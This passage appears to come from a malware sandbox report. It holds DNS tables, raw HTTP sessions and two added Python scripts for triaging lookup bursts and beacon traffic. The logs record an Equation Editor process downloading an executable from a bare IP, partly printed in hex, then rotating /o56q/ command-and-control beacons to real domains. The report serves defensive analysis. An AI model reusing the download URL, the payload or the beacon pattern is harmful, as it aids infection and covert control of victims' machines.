Nov 20, 2020 12:06:20.373017073 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.teelinkz.com | teelinkz.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 12:06:20.373017073 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | teelinkz.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:30.625853062 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.natcandy.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 12:06:30.625853062 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.216 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:30.625853062 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.211 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:30.625853062 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.217 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:30.625853062 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.210 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:30.625853062 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.212 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:30.625853062 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.218 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:30.625853062 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.215 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:36.130682945 CET | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | www.californiapropiedades.com | californiapropiedades.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 12:06:36.130682945 CET | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | californiapropiedades.com |  | 67.227.214.78 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:41.452959061 CET | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | www.pornfilm3d.com |  | 104.24.122.89 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:41.452959061 CET | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | www.pornfilm3d.com |  | 172.67.143.182 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:41.452959061 CET | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | www.pornfilm3d.com |  | 104.24.123.89 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:47.609066010 CET | 8.8.8.8 | 192.168.2.22 | 0xf09a | No error (0) | www.the-trinity-project.com |  | 185.119.173.57 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:53.072963953 CET | 8.8.8.8 | 192.168.2.22 | 0x4b92 | No error (0) | www.crimson.school | crimson.school |  | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 12:06:53.072963953 CET | 8.8.8.8 | 192.168.2.22 | 0x4b92 | No error (0) | crimson.school |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 20, 2020 12:06:58.697033882 CET | 8.8.8.8 | 192.168.2.22 | 0x4b93 | Name error (3) | www.heritagediscovery.info | none | none | A (IP address) | IN (0x0001)
Nov 20, 2020 12:07:03.852780104 CET | 8.8.8.8 | 192.168.2.22 | 0x9e1c | No error (0) | www.tnicholson.design |  | 65.254.250.119 | A (IP address) | IN (0x0001)
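
The DNS Queries and DNS Answers tables above record one host looking up ten unrelated www. names in under a minute, two of which do not exist (reply code 3), one of which only resolves to a registrar parking page, and two of which share an IP. The script below is an added example and is not part of the sandbox report: it joins query and answer rows by transaction ID, measures the lookup burst in a sliding window and pulls out the NXDOMAIN, parked and shared-IP cases an analyst would triage first. QUERIES and ANSWERS are constructed records that mirror the tables; the 60-second window, the burst threshold of five and the parking-domain list are assumptions for illustration.

```python
"""Triage of a DNS lookup burst such as the one in the tables above (added example)."""
from collections import defaultdict
from datetime import datetime

# Constructed to mirror the report: (timestamp, transaction ID, queried name).
QUERIES = [
    ("2020-11-20 12:06:06.492", "0x708c", "www.nanox.ltd"),
    ("2020-11-20 12:06:14.227", "0xa14d", "www.alloutdoorspeaker.com"),
    ("2020-11-20 12:06:20.333", "0xccff", "www.teelinkz.com"),
    ("2020-11-20 12:06:30.583", "0x2f03", "www.natcandy.com"),
    ("2020-11-20 12:06:35.975", "0x3c4e", "www.californiapropiedades.com"),
    ("2020-11-20 12:06:41.410", "0x6ec7", "www.pornfilm3d.com"),
    ("2020-11-20 12:06:47.549", "0xf09a", "www.the-trinity-project.com"),
    ("2020-11-20 12:06:53.033", "0x4b92", "www.crimson.school"),
    ("2020-11-20 12:06:58.232", "0x4b93", "www.heritagediscovery.info"),
    ("2020-11-20 12:07:03.698", "0x9e1c", "www.tnicholson.design"),
]
# Constructed to mirror the report: (transaction ID, reply code, name, cname, address).
ANSWERS = [
    ("0x708c", 3, "www.nanox.ltd", None, None),
    ("0xa14d", 0, "www.alloutdoorspeaker.com", "alloutdoorspeaker.com", None),
    ("0xa14d", 0, "alloutdoorspeaker.com", None, "137.59.52.234"),
    ("0xccff", 0, "www.teelinkz.com", "teelinkz.com", None),
    ("0xccff", 0, "teelinkz.com", None, "34.102.136.180"),
    ("0x2f03", 0, "www.natcandy.com", "parkingpage.namecheap.com", None),
    ("0x2f03", 0, "parkingpage.namecheap.com", None, "198.54.117.216"),
    ("0x2f03", 0, "parkingpage.namecheap.com", None, "198.54.117.211"),
    ("0x3c4e", 0, "www.californiapropiedades.com", "californiapropiedades.com", None),
    ("0x3c4e", 0, "californiapropiedades.com", None, "67.227.214.78"),
    ("0x6ec7", 0, "www.pornfilm3d.com", None, "104.24.122.89"),
    ("0xf09a", 0, "www.the-trinity-project.com", None, "185.119.173.57"),
    ("0x4b92", 0, "www.crimson.school", "crimson.school", None),
    ("0x4b92", 0, "crimson.school", None, "34.102.136.180"),
    ("0x4b93", 3, "www.heritagediscovery.info", None, None),
    ("0x9e1c", 0, "www.tnicholson.design", None, "65.254.250.119"),
]
# Assumed: CNAME targets that mark a domain as parked rather than actively hosted.
PARKING_CNAMES = {"parkingpage.namecheap.com"}


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def join_transactions(queries, answers):
    """Pair each query with the outcome of its transaction, matched on transaction ID."""
    by_id = defaultdict(list)
    for tid, rcode, name, cname, addr in answers:
        by_id[tid].append((rcode, name, cname, addr))
    records = []
    for ts, tid, qname in queries:
        recs = by_id.get(tid, [])
        if any(rcode == 3 for rcode, _, _, _ in recs):
            status = "nxdomain"      # reply code 3: the name does not exist
        elif any(cname in PARKING_CNAMES for _, _, cname, _ in recs):
            status = "parked"        # resolves, but only to a registrar parking page
        else:
            status = "resolved"
        ips = sorted({addr for _, _, _, addr in recs if addr})
        records.append({"ts": parse_ts(ts), "tid": tid, "name": qname,
                        "status": status, "ips": ips})
    return records


def max_distinct_domains(records, window_s=60):
    """Largest number of distinct names looked up inside any window of window_s seconds."""
    recs = sorted(records, key=lambda r: r["ts"])
    best = 0
    for i, start in enumerate(recs):
        names = {r["name"] for r in recs[i:]
                 if (r["ts"] - start["ts"]).total_seconds() <= window_s}
        best = max(best, len(names))
    return best


def shared_addresses(records):
    """Names that resolved to the same IP: shared hosting or a parking range, not a dedicated server."""
    owners = defaultdict(set)
    for r in records:
        for ip in r["ips"]:
            owners[ip].add(r["name"])
    return {ip: sorted(names) for ip, names in owners.items() if len(names) > 1}


def triage(queries=QUERIES, answers=ANSWERS, burst_threshold=5):
    """Summarise the lookups the way an analyst would before pivoting on the domains."""
    recs = join_transactions(queries, answers)
    burst = max_distinct_domains(recs)
    return {
        "distinct_domains_per_minute": burst,
        "suspicious_burst": burst >= burst_threshold,  # assumed threshold
        "nxdomain": [r["name"] for r in recs if r["status"] == "nxdomain"],
        "parked": [r["name"] for r in recs if r["status"] == "parked"],
        "shared_ips": shared_addresses(recs),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

Run against the constructed rows, the burst counter reports all ten names inside one 60-second window, flags www.nanox.ltd and www.heritagediscovery.info as non-existent, www.natcandy.com as parked, and 34.102.136.180 as shared by www.teelinkz.com and www.crimson.school; the names that actually resolve to a dedicated address are the ones worth pivoting on. The same functions accept real resolver or sensor logs once they are shaped into the two tuple layouts.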

HTTP Request Dependency Graph

• 198.23.212.188
• www.alloutdoorspeaker.com
• www.teelinkz.com
• www.natcandy.com
• www.californiapropiedades.com
• www.pornfilm3d.com
• www.the-trinity-project.com
• www.crimson.school
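
The HTTP Packets section that follows shows two stages to these hosts: EQNEDT32.EXE fetches /reg/vbc.exe from the bare IP 198.23.212.188 and receives a Content-Type of application/x-msdownload with a body starting with the MZ header, and explorer.exe then sends GET requests that carry a seven-null-byte body to a series of hosts using the same /o56q/ path and the same two query keys. The script below is an added example and is not the report's own tooling: it scores each session on those traits and groups requests by path plus query-key set so that the same beacon template hitting several hosts stands out. SESSIONS is constructed to mirror sessions 0, 1 and 2 of the report; the list of Office helper processes and the two-host minimum for a template are assumptions.

```python
"""Triage of HTTP sessions of the kind recorded in the HTTP Packets section (added example)."""
import ipaddress
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Assumed: Office helper binaries that have no business originating HTTP traffic.
OFFICE_HELPERS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed to mirror sessions 0, 1 and 2 of the report.
SESSIONS = [
    {"process": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "host": "198.23.212.188", "request": "GET /reg/vbc.exe HTTP/1.1", "body": b"",
     "resp_type": "application/x-msdownload", "resp_head": bytes.fromhex("4d5a90000300")},
    {"process": r"C:\Windows\explorer.exe", "host": "www.alloutdoorspeaker.com",
     "request": "GET /o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J HTTP/1.1",
     "body": b"\x00" * 7, "resp_type": "text/html; charset=UTF-8", "resp_head": b""},
    {"process": r"C:\Windows\explorer.exe", "host": "www.teelinkz.com",
     "request": "GET /o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== HTTP/1.1",
     "body": b"\x00" * 7, "resp_type": "text/html", "resp_head": b""},
]


def is_bare_ip(host):
    """True when the Host header is a literal IPv4/IPv6 address instead of a name."""
    candidate = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def split_request(request):
    """Return (method, path, query dict) from a request line such as 'GET /a/?k=v HTTP/1.1'."""
    method, target, _version = request.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parse_qs(parts.query, keep_blank_values=True)


def session_findings(session):
    """Traits of one session worth escalating; order is fixed so results compare cleanly."""
    findings = []
    method, _path, _query = split_request(session["request"])
    image = session["process"].rsplit("\\", 1)[-1].lower()
    if image in OFFICE_HELPERS:
        findings.append("office-helper-http")          # e.g. the Equation Editor talking HTTP
    if is_bare_ip(session["host"]):
        findings.append("bare-ip-host")                # no DNS, no certificate, no reputation
    if (session["resp_type"].lower().startswith("application/x-msdownload")
            or session["resp_head"][:2] == b"MZ"):
        findings.append("pe-download")                 # a Windows executable came back
    if method == "GET" and session["body"]:
        findings.append("get-with-body")               # browsers do not send bodies on GET
    if session["body"] and set(session["body"]) == {0}:
        findings.append("null-byte-body")              # padding bytes, not form data
    return findings


def beacon_templates(sessions, min_hosts=2):
    """Group requests by (path, sorted query keys); one template across several hosts is a rotating beacon."""
    hosts = defaultdict(set)
    for s in sessions:
        _method, path, query = split_request(s["request"])
        hosts[(path, tuple(sorted(query)))].add(s["host"])
    return {key: sorted(v) for key, v in hosts.items() if len(v) >= min_hosts}


def triage(sessions=SESSIONS):
    return {"findings": [session_findings(s) for s in sessions],
            "templates": beacon_templates(sessions)}


if __name__ == "__main__":
    for s, f in zip(SESSIONS, triage()["findings"]):
        print(s["host"], f)
    print(triage()["templates"])
```

Session 0 collects office-helper-http, bare-ip-host and pe-download, which together describe the dropper stage; sessions 1 and 2 each collect get-with-body and null-byte-body, and the template grouping ties them together as one /o56q/ beacon with keys mL0 and sFNp sent to two different hosts. Grouping on path and key names rather than on the hostnames is what survives a C2 list that rotates through unrelated domains.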

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 198.23.212.188 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 12:05:20.609724998 CET | 0 | OUT | GET /reg/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.23.212.188
Connection: Keep-Alive
Nov 20, 2020 12:05:20.729680061 CET | 1 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 11:05:19 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11
Last-Modified: Fri, 20 Nov 2020 08:11:07 GMT
ETag: "87000-5b48562f86225"
Accept-Ranges: bytes
Content-Length: 552960
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 57 74 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 68 08 00 00 06 00 00 00 00 00 00 8e 86 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 70 e7 08 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 86 08 00 4b 00 00 00 00 a0 08 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 66 08 00 00 20 00 00 00 68 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 08 00 00 04 00 00 00 6a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 86 08 00 00 00 00 00 48 00 00 00 02 00 05 00 70 e6 07 00 d0 9f 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 80 74 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 
6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 25 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7b 63 00 00 0a 02 7b 62 00 00 0a 6f 5a 00 00 0a 28 5e 00 00 0a 2a 2e 73 6f 00 00 0a 80 70 00 00 0a 2a 1e 03 6f 71 00 00 0a 2a 56 02 7b 11 00 00 04 6f 64 00 00 0a 03 28 12 00 00 2b 16 fe 01 2a 4a 02 7b 12 00 00 04 6f 31 00 00 0a 03 6f 76 00 00 0a 2a 4a 03 02 7b 13 00 00 04 6f
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWt_h @ p@@KB H.textf h `.rsrcBj@@.relocn@BpHpqtabdcefghijklmnprqstuvwzyx0123456789ABCDEFGHIJKLMNQPRTSVUWXYZ6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.r%p*6{b(^*o{a{c{boZ(^*.sop*oq*V{od(+*J{o1ov*J{o


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1192.168.2.2249166137.59.52.23480C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Nov 20, 2020 12:06:14.689788103 CET582OUTGET /o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J HTTP/1.1
                                                                                                                                                                Host: www.alloutdoorspeaker.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Nov 20, 2020 12:06:15.324542999 CET583INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                Location: https://www.alloutdoorspeaker.com/o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Date: Fri, 20 Nov 2020 11:06:15 GMT
                                                                                                                                                                Server: LiteSpeed


Session ID: 2
Source IP: 192.168.2.22
Source Port: 49167
Destination IP: 34.102.136.180
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 20, 2020 12:06:20.390630960 CET
kBytes transferred: 584
Direction: OUT
Data:
GET /o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== HTTP/1.1
Host: www.teelinkz.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Nov 20, 2020 12:06:20.512625933 CET
kBytes transferred: 584
Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 20 Nov 2020 11:06:20 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb6e13a-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 3
Source IP: 192.168.2.22
Source Port: 49168
Destination IP: 198.54.117.216
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 20, 2020 12:06:30.798893929 CET
kBytes transferred: 585
Direction: OUT
Data:
GET /o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w== HTTP/1.1
Host: www.natcandy.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID: 4
Source IP: 192.168.2.22
Source Port: 49169
Destination IP: 67.227.214.78
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 20, 2020 12:06:36.263312101 CET
kBytes transferred: 586
Direction: OUT
Data:
GET /o56q/?mL0=pV6faFGE09Anucwtu1kKnRp8occyZHoCKwW13VBtOuBMFJZe4NXXYoNYm7yc9vXPVF34hw==&sFNp=jpX0Lfi0J HTTP/1.1
Host: www.californiapropiedades.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Nov 20, 2020 12:06:36.393408060 CET
kBytes transferred: 587
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Connection: close
Content-Type: text/html
Content-Length: 706
Date: Fri, 20 Nov 2020 11:06:35 GMT
Server: LiteSpeed
Location: https://www.californiapropiedades.com/o56q/?mL0=pV6faFGE09Anucwtu1kKnRp8occyZHoCKwW13VBtOuBMFJZe4NXXYoNYm7yc9vXPVF34hw==&sFNp=jpX0Lfi0J
Vary: User-Agent
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 5
Source IP: 192.168.2.22
Source Port: 49170
Destination IP: 104.24.122.89
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 20, 2020 12:06:41.480900049 CET
kBytes transferred: 588
Direction: OUT
Data:
GET /o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA== HTTP/1.1
Host: www.pornfilm3d.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID: 6
Source IP: 192.168.2.22
Source Port: 49171
Destination IP: 185.119.173.57
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 20, 2020 12:06:47.639481068 CET
kBytes transferred: 589
Direction: OUT
Data:
GET /o56q/?mL0=Lg4DNBfwCTdoZLnXKvmswQE2HeXzej7VDwiGjOCQv6fEN8TXR+UTrTnc2v5FsvAKWI4bvw==&sFNp=jpX0Lfi0J HTTP/1.1
Host: www.the-trinity-project.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Nov 20, 2020 12:06:48.025187016 CET
kBytes transferred: 589
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Date: Fri, 20 Nov 2020 11:06:47 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Location: http://the-trinity-project.com/o56q/?mL0=Lg4DNBfwCTdoZLnXKvmswQE2HeXzej7VDwiGjOCQv6fEN8TXR+UTrTnc2v5FsvAKWI4bvw==&sFNp=jpX0Lfi0J
Content-Length: 0
Content-Type: text/html; charset=UTF-8
